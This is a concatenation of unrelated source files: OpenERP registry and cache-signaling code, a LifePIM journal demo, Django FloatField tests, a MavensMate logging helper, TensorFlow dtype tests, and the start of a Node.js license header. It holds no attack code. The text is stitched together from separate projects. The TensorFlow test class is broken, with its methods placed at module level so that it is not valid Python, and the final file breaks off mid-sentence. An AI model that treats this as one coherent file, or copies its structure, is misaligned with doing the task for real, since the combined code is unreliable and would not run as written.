        # Special case for ir_ui_menu which does not use openerp.tools.ormcache.
        ir_ui_menu = self.models.get('ir.ui.menu')
        if ir_ui_menu is not None:
            ir_ui_menu.clear_cache()

    # Useful only in a multi-process context.
    def reset_any_cache_cleared(self):
        self._any_cache_cleared = False

    # Useful only in a multi-process context.
    def any_cache_cleared(self):
        return self._any_cache_cleared

    @classmethod
    def setup_multi_process_signaling(cls, cr):
        """ Create (if needed) and read the two signaling sequences.

        :returns: the pair (registry sequence value, cache sequence value),
                  or (None, None) outside of multi-process mode.
        """
        if not openerp.multi_process:
            return None, None

        # Inter-process signaling:
        # The `base_registry_signaling` sequence indicates the whole registry
        # must be reloaded.
        # The `base_cache_signaling sequence` indicates all caches must be
        # invalidated (i.e. cleared).
        cr.execute("""SELECT sequence_name FROM information_schema.sequences WHERE sequence_name='base_registry_signaling'""")
        if not cr.fetchall():
            cr.execute("""CREATE SEQUENCE base_registry_signaling INCREMENT BY 1 START WITH 1""")
            cr.execute("""SELECT nextval('base_registry_signaling')""")
            cr.execute("""CREATE SEQUENCE base_cache_signaling INCREMENT BY 1 START WITH 1""")
            cr.execute("""SELECT nextval('base_cache_signaling')""")
        cr.execute("""
            SELECT base_registry_signaling.last_value,
                   base_cache_signaling.last_value
            FROM base_registry_signaling, base_cache_signaling""")
        r, c = cr.fetchone()
        _logger.debug("Multiprocess load registry signaling: [Registry: # %s] "\
                      "[Cache: # %s]",
                      r, c)
        return r, c

    def enter_test_mode(self):
        """ Enter the 'test' mode, where one cursor serves several requests. """
        assert self.test_cr is None
        self.test_cr = self._db.test_cursor()
        RegistryManager.enter_test_mode()

    def leave_test_mode(self):
        """ Leave the test mode. """
        assert self.test_cr is not None
        self.test_cr.force_close()
        self.test_cr = None
        RegistryManager.leave_test_mode()

    def cursor(self):
        """ Return a new cursor for the database. The cursor itself may be used
            as a context manager to commit/rollback and close automatically.
        """
        cr = self.test_cr
        if cr is not None:
            # While in test mode, we use one special cursor across requests. The
            # test cursor uses a reentrant lock to serialize accesses. The lock
            # is granted here by cursor(), and automatically released by the
            # cursor itself in its method close().
            cr.acquire()
            return cr
        return self._db.cursor()
class DummyRLock(object):
    """ Dummy reentrant lock, to be used while running rpc and js tests.

    Provides the same interface as ``threading.RLock`` (including context
    manager support) but never actually blocks: acquire/release are no-ops.
    """

    def acquire(self):
        # Intentionally does nothing: test mode must not serialize access.
        pass

    def release(self):
        # Intentionally does nothing.
        pass

    def __enter__(self):
        self.acquire()

    def __exit__(self, exc_type, exc_value, exc_tb):
        self.release()
class RegistryManager(object):
    """ Model registries manager.

        The manager is responsible for creation and deletion of model
        registries (essentially database connection/model registry pairs).
    """
    # Mapping between db name and model registry.
    # Accessed through the methods below.
    registries = {}

    # Process-wide lock protecting `registries`; swapped for a DummyRLock
    # while in test mode.
    _lock = threading.RLock()
    _saved_lock = None

    @classmethod
    def lock(cls):
        """ Return the current registry lock. """
        return cls._lock

    @classmethod
    def enter_test_mode(cls):
        """ Enter the 'test' mode, where the registry is no longer locked. """
        assert cls._saved_lock is None
        cls._lock, cls._saved_lock = DummyRLock(), cls._lock

    @classmethod
    def leave_test_mode(cls):
        """ Leave the 'test' mode. """
        assert cls._saved_lock is not None
        cls._lock, cls._saved_lock = cls._saved_lock, None

    @classmethod
    def get(cls, db_name, force_demo=False, status=None, update_module=False):
        """ Return a registry for a given database name."""
        with cls.lock():
            try:
                return cls.registries[db_name]
            except KeyError:
                # not loaded yet: build it (and cache it in `registries`)
                return cls.new(db_name, force_demo, status,
                               update_module)
            finally:
                # set db tracker - cleaned up at the WSGI
                # dispatching phase in openerp.service.wsgi_server.application
                threading.current_thread().dbname = db_name

    @classmethod
    def new(cls, db_name, force_demo=False, status=None,
            update_module=False):
        """ Create and return a new registry for a given database name.

        The (possibly) previous registry for that database name is discarded.
        """
        import openerp.modules
        with cls.lock():
            with openerp.api.Environment.manage():
                registry = Registry(db_name)

                # Initializing a registry will call general code which will in
                # turn call registries.get (this object) to obtain the registry
                # being initialized. Make it available in the registries
                # dictionary then remove it if an exception is raised.
                cls.delete(db_name)
                cls.registries[db_name] = registry
                try:
                    with registry.cursor() as cr:
                        seq_registry, seq_cache = Registry.setup_multi_process_signaling(cr)
                        registry.base_registry_signaling_sequence = seq_registry
                        registry.base_cache_signaling_sequence = seq_cache
                    # This should be a method on Registry
                    openerp.modules.load_modules(registry._db, force_demo, status, update_module)
                except Exception:
                    del cls.registries[db_name]
                    raise

                # load_modules() above can replace the registry by calling
                # indirectly new() again (when modules have to be uninstalled).
                # Yeah, crazy.
                registry = cls.registries[db_name]

                cr = registry.cursor()
                try:
                    registry.do_parent_store(cr)
                    cr.commit()
                finally:
                    cr.close()

        registry.ready = True

        if update_module:
            # only in case of update, otherwise we'll have an infinite reload loop!
            cls.signal_registry_change(db_name)
        return registry

    @classmethod
    def delete(cls, db_name):
        """Delete the registry linked to a given database. """
        with cls.lock():
            if db_name in cls.registries:
                cls.registries[db_name].clear_caches()
                del cls.registries[db_name]

    @classmethod
    def delete_all(cls):
        """Delete all the registries. """
        with cls.lock():
            for db_name in cls.registries.keys():
                cls.delete(db_name)

    @classmethod
    def clear_caches(cls, db_name):
        """Clear caches

        This clears the caches associated to methods decorated with
        ``tools.ormcache`` or ``tools.ormcache_multi`` for all the models
        of the given database name.

        This method is given to spare you a ``RegistryManager.get(db_name)``
        that would loads the given database if it was not already loaded.
        """
        with cls.lock():
            if db_name in cls.registries:
                cls.registries[db_name].clear_caches()

    @classmethod
    def check_registry_signaling(cls, db_name):
        """
        Check if the modules have changed and performs all necessary operations to update
        the registry of the corresponding database.

        :returns: True if changes has been detected in the database and False otherwise.
        """
        changed = False
        if openerp.multi_process and db_name in cls.registries:
            registry = cls.get(db_name)
            cr = registry.cursor()
            try:
                cr.execute("""
                    SELECT base_registry_signaling.last_value,
                           base_cache_signaling.last_value
                    FROM base_registry_signaling, base_cache_signaling""")
                r, c = cr.fetchone()
                _logger.debug("Multiprocess signaling check: [Registry - old# %s new# %s] "\
                              "[Cache - old# %s new# %s]",
                              registry.base_registry_signaling_sequence, r,
                              registry.base_cache_signaling_sequence, c)
                # Check if the model registry must be reloaded (e.g. after the
                # database has been updated by another process).
                if registry.base_registry_signaling_sequence is not None and registry.base_registry_signaling_sequence != r:
                    changed = True
                    _logger.info("Reloading the model registry after database signaling.")
                    registry = cls.new(db_name)
                # Check if the model caches must be invalidated (e.g. after a write
                # occured on another process). Don't clear right after a registry
                # has been reload.
                elif registry.base_cache_signaling_sequence is not None and registry.base_cache_signaling_sequence != c:
                    changed = True
                    _logger.info("Invalidating all model caches after database signaling.")
                    registry.clear_caches()
                    registry.reset_any_cache_cleared()
                    # One possible reason caches have been invalidated is the
                    # use of decimal_precision.write(), in which case we need
                    # to refresh fields.float columns.
                    for model in registry.models.values():
                        for column in model._columns.values():
                            if hasattr(column, 'digits_change'):
                                column.digits_change(cr)
                registry.base_registry_signaling_sequence = r
                registry.base_cache_signaling_sequence = c
            finally:
                cr.close()
        return changed

    @classmethod
    def signal_caches_change(cls, db_name):
        # Propagate a local cache invalidation to other processes by bumping
        # the base_cache_signaling sequence in the database.
        if openerp.multi_process and db_name in cls.registries:
            # Check the registries if any cache has been cleared and signal it
            # through the database to other processes.
            registry = cls.get(db_name)
            if registry.any_cache_cleared():
                _logger.info("At least one model cache has been cleared, signaling through the database.")
                cr = registry.cursor()
                r = 1
                try:
                    cr.execute("select nextval('base_cache_signaling')")
                    r = cr.fetchone()[0]
                finally:
                    cr.close()
                registry.base_cache_signaling_sequence = r
                registry.reset_any_cache_cleared()

    @classmethod
    def signal_registry_change(cls, db_name):
        # Tell other processes to reload the registry for db_name by bumping
        # the base_registry_signaling sequence in the database.
        if openerp.multi_process and db_name in cls.registries:
            _logger.info("Registry changed, signaling through the database")
            registry = cls.get(db_name)
            cr = registry.cursor()
            r = 1
            try:
                cr.execute("select nextval('base_registry_signaling')")
                r = cr.fetchone()[0]
            finally:
                cr.close()
            registry.base_registry_signaling_sequence = r
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
# lifepim.py
import os
import sys
import aikif.project as mod_prj
import aikif.core_data as mod_core
import aikif.dataTools.cls_datatable as mod_dat
#print(sys.version)
def main():
    """Demo driver: records sample journal entries three different ways
    (raw DataTable, a single core_data Event, and the Events manager class)
    and writes them to files in the current directory."""
    fname = 'journal.csv'
    p = mod_prj.Project('Journal Record')
    print(p.nme)

    # Attempt #1 - using DataTable directly (TOK)
    dt = mod_dat.DataTable(fname, ',', col_names=['date', 'category', 'details'])
    dt.add(['2015-05-11', 'Software', 'creating LP_ADD_DATA.py to record journal to diary'])
    dt.add(['2015-05-11', 'Software', 'update readme'])
    dt.add(['2015-05-11', 'Shopping', 'bought jeans'])
    print(dt)
    """
    date category details
    11/05/2015 Software creating LP_ADD_DATA.py to record journal to diary
    11/05/2015 Software update readme
    11/05/2015 Shopping bought jeans
    """
    dt.save_csv(fname)

    # attempt #2 using Core DATA (TOK)
    e = mod_core.Event('Sales Meeting', '2015-04-11', 'Office', 'Meet with client to discuss custom software')
    print(e.format_csv())

    # attempt #3 use an Events class to manage it all
    ev = Events(os.getcwd(), 'D', 'DAT')
    ev.add(mod_core.Event('Sales Meeting', '2014-01-11', 'Office', 'Catchup with client'))
    ev.add(mod_core.Event('Sales Meeting#3', '2015-03-11', 'Office', 'Catchup with client'))
    ev.add(mod_core.Event('DEV AIKIF - core data', '2015-05-11', 'Software', 'update TEST - no test for CORE_DATA'))
    ev.add(mod_core.Event('DEV LifePim - core data', '2015-03-11', 'Software', 'use data for LifePim'))
    ev.add(mod_core.Event('DEV AIKIF - data tools', '2015-05-11', 'Software', 'fix data tools '))
    print(ev)
    ev.save()

    # Search the in-memory events for a substring in their details column.
    txt = 'Catchup'  # 'data'
    print('\n Searching for ', txt)
    srch = ev.find(txt)
    for s in srch:
        print(s)  # s.data[2]
class Events():
    """
    Manager class for Diary / LifePIM events: keeps an in-memory list of
    event objects and knows how to search them and append them to files.
    """

    def __init__(self, fldr, filename_base, user):
        self.filename_base = filename_base
        self.user = user
        self.fldr = fldr
        self.events = []  # in-memory list of event objects
        self.header = mod_core.Event('Name', 'Date', 'Journal', 'Details')

    def __str__(self):
        # Summary header followed by one CSV line per event.
        parts = [
            ' basename = ' + self.filename_base + '\n',
            ' user = ' + self.user + '\n',
            ' fldr = ' + self.fldr + '\n',
        ]
        parts.extend(evt.format_csv() for evt in self.events)
        return ''.join(parts)

    def get_filename(self, event):
        """
        returns the old style D201505.user format of filename
        """
        # NOTE(review): `event` is currently unused and the month is
        # hard-coded — presumably a placeholder; confirm before relying on
        # per-event filenames.
        return self.fldr + os.sep + self.filename_base + '201505' + '.' + self.user

    def add(self, e):
        """Append a single event to the in-memory list."""
        self.events.append(e)

    def find(self, txt):
        """Return the events whose third data column contains ``txt``."""
        return [evt for evt in self.events if txt in evt.data[2]]

    def save(self):
        """
        save all events to folder in appropriate files
        NOTE - ONLY APPEND AT THIS STAGE - THEN USE DATABASE
        """
        for evt in self.events:
            with open(self.get_filename(evt), 'a') as out_file:
                out_file.write(evt.format_csv())
if __name__ == '__main__':
    # Allow running this module as a script.
    main()
from __future__ import unicode_literals
from django.forms import FloatField, NumberInput, ValidationError
from django.test import SimpleTestCase
from django.utils import formats, translation
from . import FormFieldAssertionsMixin
class FloatFieldTest(FormFieldAssertionsMixin, SimpleTestCase):

    def test_floatfield_1(self):
        # A default FloatField renders as <input type="number" step="any">,
        # is required, coerces numeric strings (with surrounding whitespace)
        # to float, and rejects non-numeric and non-finite input.
        f = FloatField()
        self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" required />')
        with self.assertRaisesMessage(ValidationError, "'This field is required.'"):
            f.clean('')
        with self.assertRaisesMessage(ValidationError, "'This field is required.'"):
            f.clean(None)
        self.assertEqual(1.0, f.clean('1'))
        self.assertIsInstance(f.clean('1'), float)
        self.assertEqual(23.0, f.clean('23'))
        self.assertEqual(3.1400000000000001, f.clean('3.14'))
        self.assertEqual(3.1400000000000001, f.clean(3.14))
        self.assertEqual(42.0, f.clean(42))
        with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
            f.clean('a')
        # Surrounding whitespace is stripped before conversion.
        self.assertEqual(1.0, f.clean('1.0 '))
        self.assertEqual(1.0, f.clean(' 1.0'))
        self.assertEqual(1.0, f.clean(' 1.0 '))
        with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
            f.clean('1.0a')
        self.assertIsNone(f.max_value)
        self.assertIsNone(f.min_value)
        # float() would accept these, but the field must reject non-finite
        # values.
        with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
            f.clean('Infinity')
        with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
            f.clean('NaN')
        with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
            f.clean('-Inf')

    def test_floatfield_2(self):
        # With required=False, empty values clean to None instead of raising.
        f = FloatField(required=False)
        self.assertIsNone(f.clean(''))
        self.assertIsNone(f.clean(None))
        self.assertEqual(1.0, f.clean('1'))
        self.assertIsNone(f.max_value)
        self.assertIsNone(f.min_value)

    def test_floatfield_3(self):
        # min_value/max_value are enforced by clean() and rendered as the
        # min/max attributes of the number input.
        f = FloatField(max_value=1.5, min_value=0.5)
        self.assertWidgetRendersTo(
            f,
            '<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" required />',
        )
        with self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'"):
            f.clean('1.6')
        with self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'"):
            f.clean('0.4')
        self.assertEqual(1.5, f.clean('1.5'))
        self.assertEqual(0.5, f.clean('0.5'))
        self.assertEqual(f.max_value, 1.5)
        self.assertEqual(f.min_value, 0.5)

    def test_floatfield_widget_attrs(self):
        # Explicit widget attrs (step/min/max) are rendered as given.
        f = FloatField(widget=NumberInput(attrs={'step': 0.01, 'max': 1.0, 'min': 0.0}))
        self.assertWidgetRendersTo(
            f,
            '<input step="0.01" name="f" min="0.0" max="1.0" type="number" id="id_f" required />',
        )

    def test_floatfield_localized(self):
        """
        A localized FloatField's widget renders to a text input without any
        number input specific attributes.
        """
        f = FloatField(localize=True)
        self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" required />')

    def test_floatfield_changed(self):
        # has_changed() compares against the (localized) text representation,
        # so an equivalent numeric string counts as unchanged.
        f = FloatField()
        n = 4.35
        self.assertFalse(f.has_changed(n, '4.3500'))

        with translation.override('fr'), self.settings(USE_L10N=True):
            f = FloatField(localize=True)
            localized_n = formats.localize_input(n)  # -> '4,35' in French
            self.assertFalse(f.has_changed(n, localized_n))
import os
import sublime
import logging
from logging.handlers import RotatingFileHandler
import tempfile
mm_dir = os.path.dirname(__file__)  # directory this plugin file lives in
sublime_version = int(float(sublime.version()))  # Sublime Text build number as an int
settings = None        # presumably populated elsewhere with plugin settings — TODO confirm
merge_settings = None  # presumably populated elsewhere — TODO confirm
logger = None          # configured by setup_logging() below
def setup_logging():
    """Configure the module-level ``logger`` with a rotating file handler.

    The log directory comes from the 'mm_log_location' setting, falling back
    to the system temp dir. Best-effort by design: any failure (e.g.
    permission denied on the log file) leaves logging unconfigured rather
    than breaking plugin load.
    """
    try:
        # NOTE(review): this binds a *local* `settings`, not the module-level
        # global of the same name — presumably intentional; confirm.
        settings = sublime.load_settings('mavensmate.sublime-settings')
        logging.raiseExceptions = False
        logging.basicConfig(level=logging.DEBUG)
        log_location = settings.get('mm_log_location', tempfile.gettempdir())
        logging_handler = RotatingFileHandler(
            os.path.join(log_location, "mmst.log"),
            maxBytes=1 * 1024 * 1024,
            backupCount=5)
        # mm log setup
        global logger
        logger = logging.getLogger('mmst')
        logger.setLevel(logging.DEBUG)
        logger.propagate = False
        logger.addHandler(logging_handler)
    except Exception:
        # Deliberate best-effort swallow, but no longer a bare `except:` so
        # KeyboardInterrupt/SystemExit still propagate.
        # TODO: need to handle this permission denied error
        # (https://github.com/joeferraro/MavensMate-SublimeText/issues/293)
        pass
def debug(msg, obj=None):
    """Log ``msg`` (and optionally ``obj``) to the mmst logger and echo it
    to the console with a '[MAVENSMATE]' prefix.

    If the logger is unavailable (e.g. setup_logging() failed and ``logger``
    is still None), falls back to console output only.
    """
    try:
        # `is not None` instead of `!= None`; the duplicated elif/else
        # branches of the original are merged (they printed the same thing).
        if obj is not None and type(msg) is str:
            logger.debug(msg + ' ', obj)
            print('[MAVENSMATE]: ' + msg + ' ', obj)
        else:
            logger.debug(msg)
            print('[MAVENSMATE]:', msg)
    except Exception:
        # Logger is None or misconfigured; still echo to the console.
        if obj is not None and type(msg) is str:
            print('[MAVENSMATE]: ' + msg + ' ', obj)
        else:
            print('[MAVENSMATE]:', msg)
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.framework.dtypes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import _dtypes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
def _is_numeric_dtype_enum(datatype_enum):
  """Returns True unless `datatype_enum` is one of the non-numeric DataType
  enum values (variant, resource, their ref variants, or invalid)."""
  return datatype_enum not in (
      types_pb2.DT_VARIANT,
      types_pb2.DT_VARIANT_REF,
      types_pb2.DT_INVALID,
      types_pb2.DT_RESOURCE,
      types_pb2.DT_RESOURCE_REF,
  )
class TypesTest(test_util.TensorFlowTestCase):
def testAllTypesConstructible(self):
  # Every valid DataType enum value can be passed to the DType constructor
  # and round-trips through .as_datatype_enum.
  for datatype_enum in types_pb2.DataType.values():
    if datatype_enum == types_pb2.DT_INVALID:
      continue
    self.assertEqual(datatype_enum,
                     dtypes.DType(datatype_enum).as_datatype_enum)
def testAllTypesConvertibleToDType(self):
  """as_dtype() accepts every valid DataType enum and round-trips it."""
  for enum_value in types_pb2.DataType.values():
    if enum_value != types_pb2.DT_INVALID:
      self.assertEqual(enum_value,
                       dtypes.as_dtype(enum_value).as_datatype_enum)
def testAllTypesConvertibleToNumpyDtype(self):
  # Every numeric dtype exposes a usable numpy dtype; converting that numpy
  # dtype back yields the same base DType — except bfloat16, which has no
  # first-class numpy equivalent.
  for datatype_enum in types_pb2.DataType.values():
    if not _is_numeric_dtype_enum(datatype_enum):
      continue
    dtype = dtypes.as_dtype(datatype_enum)
    numpy_dtype = dtype.as_numpy_dtype
    # Must be able to allocate an array with the numpy dtype.
    _ = np.empty((1, 1, 1, 1), dtype=numpy_dtype)
    if dtype.base_dtype != dtypes.bfloat16:
      # NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
      self.assertEqual(
          dtypes.as_dtype(datatype_enum).base_dtype,
          dtypes.as_dtype(numpy_dtype))
def testAllPybind11DTypeConvertibleToDType(self):
  """A pybind11 _dtypes.DType compares equal to the Python-side DType."""
  valid_enums = (
      enum for enum in types_pb2.DataType.values()
      if enum != types_pb2.DT_INVALID
  )
  for enum_value in valid_enums:
    pybind_dtype = _dtypes.DType(enum_value)
    self.assertEqual(dtypes.as_dtype(enum_value), pybind_dtype)
def testInvalid(self):
  """DT_INVALID is rejected by both the DType constructor and as_dtype()."""
  for converter in (dtypes.DType, dtypes.as_dtype):
    with self.assertRaises(TypeError):
      converter(types_pb2.DT_INVALID)
def testNumpyConversion(self):
  # as_dtype() accepts numpy scalar types, numpy dtypes, array dtypes, and
  # any object with a `dtype` attribute; structured dtypes are rejected.
  self.assertIs(dtypes.float32, dtypes.as_dtype(np.float32))
  self.assertIs(dtypes.float64, dtypes.as_dtype(np.float64))
  self.assertIs(dtypes.int32, dtypes.as_dtype(np.int32))
  self.assertIs(dtypes.int64, dtypes.as_dtype(np.int64))
  self.assertIs(dtypes.uint8, dtypes.as_dtype(np.uint8))
  self.assertIs(dtypes.uint16, dtypes.as_dtype(np.uint16))
  self.assertIs(dtypes.int16, dtypes.as_dtype(np.int16))
  self.assertIs(dtypes.int8, dtypes.as_dtype(np.int8))
  self.assertIs(dtypes.complex64, dtypes.as_dtype(np.complex64))
  self.assertIs(dtypes.complex128, dtypes.as_dtype(np.complex128))
  # Object arrays (e.g. arrays of Python strings) map to tf.string.
  self.assertIs(dtypes.string, dtypes.as_dtype(np.object_))
  self.assertIs(dtypes.string,
                dtypes.as_dtype(np.array(["foo", "bar"]).dtype))
  self.assertIs(dtypes.bool, dtypes.as_dtype(np.bool_))
  # Structured dtypes have no TensorFlow equivalent.
  with self.assertRaises(TypeError):
    dtypes.as_dtype(np.dtype([("f1", np.uint), ("f2", np.int32)]))

  # Anything exposing a `dtype` attribute is accepted, whether the
  # attribute is a dtype string...
  class AnObject(object):
    dtype = "f4"

  self.assertIs(dtypes.float32, dtypes.as_dtype(AnObject))

  # ... or an actual np.dtype instance.
  class AnotherObject(object):
    dtype = np.dtype(np.complex64)

  self.assertIs(dtypes.complex64, dtypes.as_dtype(AnotherObject))
def testRealDtype(self):
  # real_dtype is the identity for real dtypes and maps complex dtypes to
  # their component float dtype.
  for dtype in [
      dtypes.float32, dtypes.float64, dtypes.bool, dtypes.uint8, dtypes.int8,
      dtypes.int16, dtypes.int32, dtypes.int64
  ]:
    self.assertIs(dtype.real_dtype, dtype)
  self.assertIs(dtypes.complex64.real_dtype, dtypes.float32)
  self.assertIs(dtypes.complex128.real_dtype, dtypes.float64)
def testStringConversion(self):
  """Every canonical dtype name, and its '_ref' variant (uint16_ref is not
  asserted here), maps via as_dtype() to the matching module-level DType;
  unknown names raise TypeError."""
  names = [
      'float32', 'float64', 'int32', 'uint8', 'uint16', 'int16', 'int8',
      'string', 'complex64', 'complex128', 'int64', 'bool', 'qint8',
      'quint8', 'qint32', 'bfloat16',
  ]
  for name in names:
    self.assertIs(getattr(dtypes, name), dtypes.as_dtype(name))
    if name != 'uint16':
      ref_name = name + '_ref'
      self.assertIs(getattr(dtypes, ref_name), dtypes.as_dtype(ref_name))
  with self.assertRaises(TypeError):
    dtypes.as_dtype('not_a_type')
def testDTypesHaveUniqueNames(self):
  """No two valid DataType enum values map to DTypes with the same name."""
  valid_dtypes = [
      dtypes.as_dtype(enum)
      for enum in types_pb2.DataType.values()
      if enum != types_pb2.DT_INVALID
  ]
  unique_names = {dtype.name for dtype in valid_dtypes}
  self.assertEqual(len(valid_dtypes), len(unique_names))
def testIsInteger(self):
  """is_integer is True exactly for the plain (non-quantized) integer dtypes."""
  expectations = {
      'int8': True, 'int16': True, 'int32': True, 'int64': True,
      'uint8': True, 'uint16': True,
      'complex64': False, 'complex128': False,
      'float': False, 'double': False,
      'string': False, 'bool': False, 'bfloat16': False,
      'qint8': False, 'qint16': False, 'qint32': False,
      'quint8': False, 'quint16': False,
  }
  for type_name, expected in expectations.items():
    self.assertEqual(dtypes.as_dtype(type_name).is_integer, expected)
def testIsFloating(self):
  """is_floating is True exactly for float32, float64 and bfloat16."""
  expectations = {
      'int8': False, 'int16': False, 'int32': False, 'int64': False,
      'uint8': False, 'uint16': False,
      'complex64': False, 'complex128': False,
      'float32': True, 'float64': True,
      'string': False, 'bool': False, 'bfloat16': True,
      'qint8': False, 'qint16': False, 'qint32': False,
      'quint8': False, 'quint16': False,
  }
  for type_name, expected in expectations.items():
    self.assertEqual(dtypes.as_dtype(type_name).is_floating, expected)
def testIsComplex(self):
  """is_complex is True exactly for complex64 and complex128."""
  expectations = {
      'int8': False, 'int16': False, 'int32': False, 'int64': False,
      'uint8': False, 'uint16': False,
      'complex64': True, 'complex128': True,
      'float32': False, 'float64': False,
      'string': False, 'bool': False, 'bfloat16': False,
      'qint8': False, 'qint16': False, 'qint32': False,
      'quint8': False, 'quint16': False,
  }
  for type_name, expected in expectations.items():
    self.assertEqual(dtypes.as_dtype(type_name).is_complex, expected)
def testIsUnsigned(self):
  """is_unsigned is True exactly for the plain unsigned integer dtypes."""
  expectations = {
      'int8': False, 'int16': False, 'int32': False, 'int64': False,
      'uint8': True, 'uint16': True,
      'float32': False, 'float64': False,
      'bool': False, 'string': False,
      'complex64': False, 'complex128': False, 'bfloat16': False,
      'qint8': False, 'qint16': False, 'qint32': False,
      'quint8': False, 'quint16': False,
  }
  for type_name, expected in expectations.items():
    self.assertEqual(dtypes.as_dtype(type_name).is_unsigned, expected)
def testMinMax(self):
  """min/max properties of every numeric dtype evaluate and match knowns."""
  # make sure min/max evaluates for all data types that have min/max
  for datatype_enum in types_pb2.DataType.values():
    if not _is_numeric_dtype_enum(datatype_enum):
      continue
    dtype = dtypes.as_dtype(datatype_enum)
    numpy_dtype = dtype.as_numpy_dtype
    # ignore types for which there are no minimum/maximum (or we cannot
    # compute it, such as for the q* types)
    if (dtype.is_quantized or dtype.base_dtype == dtypes.bool or
        dtype.base_dtype == dtypes.string or
        dtype.base_dtype == dtypes.complex64 or
        dtype.base_dtype == dtypes.complex128):
      continue
    print("%s: %s - %s" % (dtype, dtype.min, dtype.max))
    # check some values that are known
    if numpy_dtype == np.bool_:
      self.assertEqual(dtype.min, 0)
      self.assertEqual(dtype.max, 1)
    if numpy_dtype == np.int8:
      self.assertEqual(dtype.min, -128)
      self.assertEqual(dtype.max, 127)
    if numpy_dtype == np.int16:
      self.assertEqual(dtype.min, -32768)
      self.assertEqual(dtype.max, 32767)
    if numpy_dtype == np.int32:
      self.assertEqual(dtype.min, -2147483648)
      self.assertEqual(dtype.max, 2147483647)
    if numpy_dtype == np.int64:
      self.assertEqual(dtype.min, -9223372036854775808)
      self.assertEqual(dtype.max, 9223372036854775807)
    if numpy_dtype == np.uint8:
      self.assertEqual(dtype.min, 0)
      self.assertEqual(dtype.max, 255)
    # np.uint16 can map to either tf.uint16 or (presumably, in this code's
    # vintage) tf.bfloat16, so the two are distinguished explicitly.
    if numpy_dtype == np.uint16:
      if dtype == dtypes.uint16:
        self.assertEqual(dtype.min, 0)
        self.assertEqual(dtype.max, 65535)
      elif dtype == dtypes.bfloat16:
        # NOTE(review): 4294967295 is the uint32 maximum and looks out of
        # place for bfloat16 (cf. the float.fromhex bfloat16 check below)
        # — confirm this branch is intentional.
        self.assertEqual(dtype.min, 0)
        self.assertEqual(dtype.max, 4294967295)
    if numpy_dtype == np.uint32:
      self.assertEqual(dtype.min, 0)
      self.assertEqual(dtype.max, 4294967295)
    if numpy_dtype == np.uint64:
      self.assertEqual(dtype.min, 0)
      self.assertEqual(dtype.max, 18446744073709551615)
    if numpy_dtype in (np.float16, np.float32, np.float64):
      self.assertEqual(dtype.min, np.finfo(numpy_dtype).min)
      self.assertEqual(dtype.max, np.finfo(numpy_dtype).max)
    # bfloat16 extremes: +/- 0x1.FEp127 (all-ones mantissa, max exponent).
    if numpy_dtype == dtypes.bfloat16.as_numpy_dtype:
      self.assertEqual(dtype.min, float.fromhex("-0x1.FEp127"))
      self.assertEqual(dtype.max, float.fromhex("0x1.FEp127"))
def testRepr(self):
  """repr(dtype) is 'tf.<name>' and round-trips through eval."""
  # Test is currently disabled; see the referenced bug.
  self.skipTest("b/142725777")
  for enum, name in dtypes._TYPE_TO_STRING.items():
    # presumably enum values above 100 are the *_ref variants — confirm.
    if enum > 100:
      continue
    dtype = dtypes.DType(enum)
    self.assertEqual(repr(dtype), "tf." + name)
    # The import makes the "tf." prefix resolvable inside eval() below.
    import tensorflow as tf
    dtype2 = eval(repr(dtype))
    self.assertEqual(type(dtype2), dtypes.DType)
    self.assertEqual(dtype, dtype2)
def testEqWithNonTFTypes(self):
  """A DType never compares equal to a plain Python type or value."""
  for tf_dtype, non_tf_value in ((dtypes.int32, int), (dtypes.float64, 2.1)):
    self.assertNotEqual(tf_dtype, non_tf_value)
def testPythonLongConversion(self):
  """An integer too large for int32 converts to tf.int64 via numpy."""
  big_int_dtype = np.array(2**32).dtype
  self.assertIs(dtypes.int64, dtypes.as_dtype(big_int_dtype))
def testPythonTypesConversion(self):
  """Built-in Python types map onto their canonical TF dtypes."""
  for expected, python_type in ((dtypes.float32, float), (dtypes.bool, bool)):
    self.assertIs(expected, dtypes.as_dtype(python_type))
def testReduce(self):
  """__reduce__ pickles every DType as (as_dtype, (name,)) and round-trips."""
  for enum in dtypes._TYPE_TO_STRING:
    dtype = dtypes.DType(enum)
    constructor, arguments = dtype.__reduce__()
    self.assertEqual(constructor, dtypes.as_dtype)
    self.assertEqual(arguments, (dtype.name,))
    # Re-applying the constructor must reconstruct an equal DType.
    self.assertEqual(constructor(*arguments), dtype)
def testAsDtypeInvalidArgument(self):
  """as_dtype rejects values it cannot interpret, such as a tuple."""
  invalid_argument = (dtypes.int32, dtypes.float32)
  with self.assertRaises(TypeError):
    dtypes.as_dtype(invalid_argument)
def testAsDtypeReturnsInternedVersion(self):
  """as_dtype maps an equal DType instance onto the canonical interned one."""
  fresh_instance = dtypes.DType(types_pb2.DT_VARIANT)
  self.assertIs(dtypes.as_dtype(fresh_instance), dtypes.variant)
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
  googletest.main()
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
